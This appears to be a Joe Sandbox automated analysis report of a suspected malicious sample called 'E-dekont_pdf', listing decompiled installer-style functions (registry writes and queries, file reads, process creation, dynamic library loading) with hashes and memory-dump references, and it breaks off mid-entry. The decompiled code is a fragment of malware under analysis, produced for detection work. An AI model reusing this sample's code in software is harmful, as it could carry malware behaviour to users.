                                                                                              • Instruction ID: cf6a8f87042a2424891e836606eabdb33e3a123bfc384c52d255b42f592b4952
                                                                                              • Opcode Fuzzy Hash: a9d2187e040ee4697ff3add997d8a8dad27d27370b9dd5eba1639da8b258d051
                                                                                              • Instruction Fuzzy Hash: 0821D872A052509BEB20EFA5DD84D9E73A4AF14314751493BF542F72D0D67C9C418B1D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040248A Relevance: 4.6, APIs: 3, Instructions: 64registrystringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 85%
                                                                                              			E0040248A(void* __eax, int __ebx, intOrPtr __edx) {
				void* _t20;
				void* _t21;
				int _t24;
				long _t25;
				char _t27;
				int _t30;
				void* _t32;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;

				_t33 = __edx;
				_t30 = __ebx;
				_t37 =  *((intOrPtr*)(_t39 - 0x20));
				_t34 = __eax;
				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
				 *(_t39 - 0x44) = E00402DA6(2);
				_t20 = E00402DA6(0x11);
				 *(_t39 - 4) = 1;
				_t21 = E00402E36(_t42, _t34, _t20, 2); // executed
				 *(_t39 + 8) = _t21;
				if(_t21 != __ebx) {
					_t24 = 0;
					if(_t37 == 1) {
						E00402DA6(0x23);
						_t24 = lstrlenW(0x4125f8) + _t29 + 2;
					}
					if(_t37 == 4) {
						_t27 = E00402D84(3);
						_pop(_t32);
						 *0x4125f8 = _t27;
						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
						_t24 = _t37;
					}
					if(_t37 == 3) {
						_t24 = E00403371(_t32,  *((intOrPtr*)(_t39 - 0x24)), _t30, 0x4125f8, 0xc000);
					}
					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x4125f8, _t24); // executed
					if(_t25 == 0) {
						 *(_t39 - 4) = _t30;
					}
					_push( *(_t39 + 8));
					RegCloseKey(); // executed
				}
				 *0x4702e8 =  *0x4702e8 +  *(_t39 - 4);
				return 0;
			}















                                                                                              0x0040248a
                                                                                              0x0040248a
                                                                                              0x0040248a
                                                                                              0x0040248d
                                                                                              0x00402494
                                                                                              0x0040249e
                                                                                              0x004024a1
                                                                                              0x004024aa
                                                                                              0x004024b1
                                                                                              0x004024b8
                                                                                              0x004024bb
                                                                                              0x004024c1
                                                                                              0x004024cb
                                                                                              0x004024cf
                                                                                              0x004024da
                                                                                              0x004024da
                                                                                              0x004024e1
                                                                                              0x004024e5
                                                                                              0x004024ea
                                                                                              0x004024eb
                                                                                              0x004024f1
                                                                                              0x004024f4
                                                                                              0x004024f4
                                                                                              0x004024f8
                                                                                              0x00402504
                                                                                              0x00402504
                                                                                              0x00402515
                                                                                              0x0040251d
                                                                                              0x0040251f
                                                                                              0x0040251f
                                                                                              0x00402522
                                                                                              0x004025fd
                                                                                              0x004025fd
                                                                                              0x00402c2d
                                                                                              0x00402c39

                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(004125F8,00000023,00000011,00000002), ref: 004024D5
                                                                                              • RegSetValueExW.KERNELBASE(?,?,?,?,004125F8,00000000,00000011,00000002), ref: 00402515
                                                                                              • RegCloseKey.KERNELBASE(?,?,?,004125F8,00000000,00000011,00000002), ref: 004025FD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseValuelstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 2655323295-0
                                                                                              • Opcode ID: b61b0d2596c69915dd7a3a2e8e582c3d2f18f816548c7161653bb83207e048b3
                                                                                              • Instruction ID: 522267cc353e07343dd801e2092b634aa3a47a5894277993a9ab26856076dc84
                                                                                              • Opcode Fuzzy Hash: b61b0d2596c69915dd7a3a2e8e582c3d2f18f816548c7161653bb83207e048b3
                                                                                              • Instruction Fuzzy Hash: EE117C71E00118BEEF10AFA5DE8DEAEBAB8BB44354F11443AF504F61D1DAB98D409A58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040259E Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 86%
                                                                                              			E0040259E(int* __ebx, intOrPtr __edx, short* __edi) {
				void* _t9;
				int _t10;
				long _t13;
				int* _t16;
				intOrPtr _t21;
				short* _t22;
				void* _t24;
				void* _t26;
				void* _t29;

				_t22 = __edi;
				_t21 = __edx;
				_t16 = __ebx;
				_t9 = E00402DE6(_t29, 0x20019); // executed
				_t24 = _t9;
				_t10 = E00402D84(3);
				 *((intOrPtr*)(_t26 - 0x10)) = _t21;
				 *__edi = __ebx;
				if(_t24 == __ebx) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				} else {
					 *(_t26 + 8) = 0x1fff;
					if( *((intOrPtr*)(_t26 - 0x20)) == __ebx) {
						_t13 = RegEnumValueW(_t24, _t10, __edi, _t26 + 8, __ebx, __ebx, __ebx, __ebx);
						__eflags = _t13;
						if(_t13 != 0) {
							 *((intOrPtr*)(_t26 - 4)) = 1;
						}
					} else {
						RegEnumKeyW(_t24, _t10, __edi, 0x1fff);
					}
					_t22[0x1fff] = _t16;
					_push(_t24); // executed
					RegCloseKey(); // executed
				}
				 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}












                                                                                              0x0040259e
                                                                                              0x0040259e
                                                                                              0x0040259e
                                                                                              0x004025a3
                                                                                              0x004025aa
                                                                                              0x004025ac
                                                                                              0x004025b4
                                                                                              0x004025b7
                                                                                              0x004025ba
                                                                                              0x0040292e
                                                                                              0x004025c0
                                                                                              0x004025c8
                                                                                              0x004025cb
                                                                                              0x004025e4
                                                                                              0x004025ea
                                                                                              0x004025ec
                                                                                              0x004025ee
                                                                                              0x004025ee
                                                                                              0x004025cd
                                                                                              0x004025d1
                                                                                              0x004025d1
                                                                                              0x004025f5
                                                                                              0x004025fc
                                                                                              0x004025fd
                                                                                              0x004025fd
                                                                                              0x00402c2d
                                                                                              0x00402c39

                                                                                              APIs
                                                                                              • RegEnumKeyW.ADVAPI32(00000000,00000000,?,00001FFF), ref: 004025D1
                                                                                              • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E4
                                                                                              • RegCloseKey.KERNELBASE(?,?,?,004125F8,00000000,00000011,00000002), ref: 004025FD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: Enum$CloseValue
                                                                                              • String ID:
                                                                                              • API String ID: 397863658-0
                                                                                              • Opcode ID: b01e2cfe39e7689827a8089454abf6e17b0607031e547a06750e3a169d6cd57b
                                                                                              • Instruction ID: 77ecf9e51a0a31f861f8b6a470f9b6508cc9013fd6fdf14c98bc0c5cd18c1f9b
                                                                                              • Opcode Fuzzy Hash: b01e2cfe39e7689827a8089454abf6e17b0607031e547a06750e3a169d6cd57b
                                                                                              • Instruction Fuzzy Hash: 1F017CB1904105ABEB159FA4DE5CAAEB67CEF40348F10403EF501B61D0EBB84E45966D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004061DB Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22fileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004061DB(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                              0x004061df
                                                                                              0x004061ef
                                                                                              0x004061f7
                                                                                              0x00000000
                                                                                              0x004061fe
                                                                                              0x00000000
                                                                                              0x00406200

                                                                                              APIs
                                                                                              • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g color="#000" font-weight="400" font-family="sans-serif" fill="#474747"><path d="M1.032 1.032V15H15V1.03zm2 2H13V13H3.03z" style="line-height:normal;font-variant-ligatures:normal;font-variant-pos,0041E6F0,004035F5,?,?,004034F9,<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g color="#000" font-weight="400" font-family="sans-serif" fill="#474747"><path d="M1.032 1.032V15H15V1.03zm2 2H13V13H3.03z" style="line-height:normal;font-variant-ligatures:normal;font-variant-pos,00004000,?,00000000,004033A3), ref: 004061EF
                                                                                              Strings
                                                                                              • <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g color="#000" font-weight="400" font-family="sans-serif" fill="#474747"><path d="M1.032 1.032V15H15V1.03zm2 2H13V13H3.03z" style="line-height:normal;font-variant-ligatures:normal;font-variant-pos, xrefs: 004061DE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileRead
                                                                                              • String ID: <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g color="#000" font-weight="400" font-family="sans-serif" fill="#474747"><path d="M1.032 1.032V15H15V1.03zm2 2H13V13H3.03z" style="line-height:normal;font-variant-ligatures:normal;font-variant-pos
                                                                                              • API String ID: 2738559852-1653615292
                                                                                              • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                              • Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
                                                                                              • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                              • Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040252A Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 84%
                                                                                              			E0040252A(int* __ebx, char* __edi) {
				void* _t17;
				short* _t18;
				void* _t35;
				void* _t37;
				void* _t40;

				_t33 = __edi;
				_t27 = __ebx;
				_t17 = E00402DE6(_t40, 0x20019); // executed
				_t35 = _t17;
				_t18 = E00402DA6(0x33);
				 *__edi = __ebx;
				if(_t35 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x10) = 0x4000;
					if(RegQueryValueExW(_t35, _t18, __ebx, _t37 + 8, __edi, _t37 - 0x10) != 0) {
						L7:
						 *_t33 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x20) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x20) == __ebx;
							E004065AF(__edi,  *__edi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x20);
								_t33[0x3ffe] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t35); // executed
					RegCloseKey(); // executed
				}
				 *0x4702e8 =  *0x4702e8 +  *(_t37 - 4);
				return 0;
			}








                                                                                              0x0040252a
                                                                                              0x0040252a
                                                                                              0x0040252f
                                                                                              0x00402536
                                                                                              0x00402538
                                                                                              0x0040253f
                                                                                              0x00402542
                                                                                              0x0040292e
                                                                                              0x00402548
                                                                                              0x0040254b
                                                                                              0x00402566
                                                                                              0x00402596
                                                                                              0x00402596
                                                                                              0x00402599
                                                                                              0x00402568
                                                                                              0x0040256c
                                                                                              0x00402585
                                                                                              0x0040258c
                                                                                              0x0040258f
                                                                                              0x0040256e
                                                                                              0x00402571
                                                                                              0x0040257c
                                                                                              0x004025f5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402571
                                                                                              0x0040256c
                                                                                              0x004025fc
                                                                                              0x004025fd
                                                                                              0x004025fd
                                                                                              0x00402c2d
                                                                                              0x00402c39

                                                                                              APIs
                                                                                              • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
                                                                                              • RegCloseKey.KERNELBASE(?,?,?,004125F8,00000000,00000011,00000002), ref: 004025FD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseQueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3356406503-0
                                                                                              • Opcode ID: 76c6587182dafda624022af4ad651db221de21eb378feb2195e69e073e96f7e1
                                                                                              • Instruction ID: f7ec3822b4f738fb8e8635393954ca42cecdc22d397d028f94b3ce30fcbb66f1
                                                                                              • Opcode Fuzzy Hash: 76c6587182dafda624022af4ad651db221de21eb378feb2195e69e073e96f7e1
                                                                                              • Instruction Fuzzy Hash: FF116D71900219EADF15DFA4DE589AE7774FF04345B20443BE401B62D0E7B88A45EB5D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 69%
                                                                                              			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x470290;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x46824c =  *0x46824c + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x46824c, 0x7530,  *0x468234), 0); // executed
					}
				}
				return 0;
			}











                                                                                              0x0040138a
                                                                                              0x004013fa
                                                                                              0x0040139b
                                                                                              0x004013a0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004013a2
                                                                                              0x004013a3
                                                                                              0x004013ad
                                                                                              0x00000000
                                                                                              0x00401404
                                                                                              0x004013b0
                                                                                              0x004013b7
                                                                                              0x004013bd
                                                                                              0x004013be
                                                                                              0x004013c0
                                                                                              0x004013c2
                                                                                              0x004013b9
                                                                                              0x004013b9
                                                                                              0x004013ba
                                                                                              0x004013ba
                                                                                              0x004013c9
                                                                                              0x004013cb
                                                                                              0x004013f4
                                                                                              0x004013f4
                                                                                              0x004013c9
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                              • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: 933049ac38a9dfba668b30bbb75d7fbb807da3e94af494bfd8c0503ec6455ea0
                                                                                              • Instruction ID: 78bdf42a2e7415e9e902a73772ee10ad2712d102aa3be259db39fbfb79589c6f
                                                                                              • Opcode Fuzzy Hash: 933049ac38a9dfba668b30bbb75d7fbb807da3e94af494bfd8c0503ec6455ea0
                                                                                              • Instruction Fuzzy Hash: 4301F431621220DBE7195B389D15B2A3798E710714F10827FF855F65F1EA78CC029B5D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405C4B Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00405C4B(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x45e750->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x45e750,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                                              0x00405c54
                                                                                              0x00405c74
                                                                                              0x00405c7c
                                                                                              0x00405c81
                                                                                              0x00000000
                                                                                              0x00405c87
                                                                                              0x00405c8b

                                                                                              APIs
                                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0045E750,00000000,00000000), ref: 00405C74
                                                                                              • CloseHandle.KERNEL32(?), ref: 00405C81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateHandleProcess
                                                                                              • String ID:
                                                                                              • API String ID: 3712363035-0
                                                                                              • Opcode ID: 28376316e8dbb65054eb2f5b34233d548848c488cdfe7423a54e43cf92b2d496
                                                                                              • Instruction ID: 3af1e8069b26ce5c77d9d2df02a69335b0ea5fba402df0045a62495977d8a49f
                                                                                              • Opcode Fuzzy Hash: 28376316e8dbb65054eb2f5b34233d548848c488cdfe7423a54e43cf92b2d496
                                                                                              • Instruction Fuzzy Hash: 45E0B6B4600209BFFB009F65EE09F7B7BACFB04605F404926BD51F2191D778E9148A78
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406A35 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00406A35(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E004069C5(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                                                              0x00406a3d
                                                                                              0x00406a40
                                                                                              0x00406a47
                                                                                              0x00406a4f
                                                                                              0x00406a5b
                                                                                              0x00000000
                                                                                              0x00406a62
                                                                                              0x00406a52
                                                                                              0x00406a59
                                                                                              0x00000000
                                                                                              0x00406a6a
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                                                                • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                                                                • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                                                                                                • Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.77084955068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.77084926247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085042770.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085083526.0000000000561000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.77085727384.0000000000571000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_E-dekont_pdf.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                              • String ID:
                                                                                              • API String ID: 2547128583-0
                                                                                              • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                                                              • Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
                                                                                              • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
